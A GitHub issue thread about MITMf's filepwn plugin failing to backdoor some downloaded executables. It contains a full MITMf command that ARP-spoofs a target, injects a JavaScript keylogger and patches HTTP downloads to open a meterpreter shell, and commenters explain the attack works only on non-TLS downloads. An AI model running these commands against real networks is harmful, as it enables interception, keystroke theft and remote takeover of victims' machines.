### ISSUE TITLE
MITMf not working on all executable files

### ISSUE THREAD

**Issue by githubname1** [byt3bl33d3r/MITMf#280]
Hello. I have run MITMf with `mitmf -i eth0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.8 --jskeylogger –filepwn`. If the target Windows 7 machine downloads a file from here http://www.rarlab.com/
the file gets patched and if it is enabled, a meterpreter shell opens. Though when a file gets downloaded from here for example: http://www.softpedia.com/dyn-postdownload.php/d37271efddba6a73f6dfb185f37d2e44/56dc67e0/33a0/0/1?tsf=0 nothing happens - the file does not get patched by mitmf. Is this a bug?

**Comment by necony286** [comment]
have to same problem

**Comment by nelodvn** [comment]
The second link you mentioned leads to this URL: https://notepad-plus-plus.org/repository/6.x/6.9/npp.6.9.Installer.exe

This connection is using HTTPS. I think that BDProxy only works with servers "that serve binaries via non-SSL/TLS means".
Check documentation for more information: https://github.com/secretsquirrel/BDFProxy.

**Comment by necony286** [comment]
you're right dude i didn't notice it was sll

**Comment by githubname1** [comment]
It does not use, at least not to me HTTPS. When you click the link choose the external mirror 1 **not** the other. Although, it is known that only HTTP connection can be attacked, so i was referring only to them. Do all exe get patched in your system @nelodvn ?

**Comment by nelodvn** [comment]
@githubname1 this is actually the Mirror 1 link: https://notepad-plus-plus.org/repository/6.x/6.9/npp.6.9.Installer.exe
This is the "softpedia mirror", the mirror 2: http://download.softpedia.com/dl/447deed26e95617ea7fbfb979cd7df25/56df5cba/100013216/software/office/npp.6.9.Installer.exe

Please, can you retry with the second mirror to check if it get patched?

And yes, in my scenarios, using non ssl connections, I can got all of them patched. But I've never tried in the wild.

**Comment by byt3bl33d3r** [comment]
^^ what @nelodvn said. Also, you didn't follow the guidelines for submitting a bug report. Please see the wiki [here](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) on how to properly report a bug.
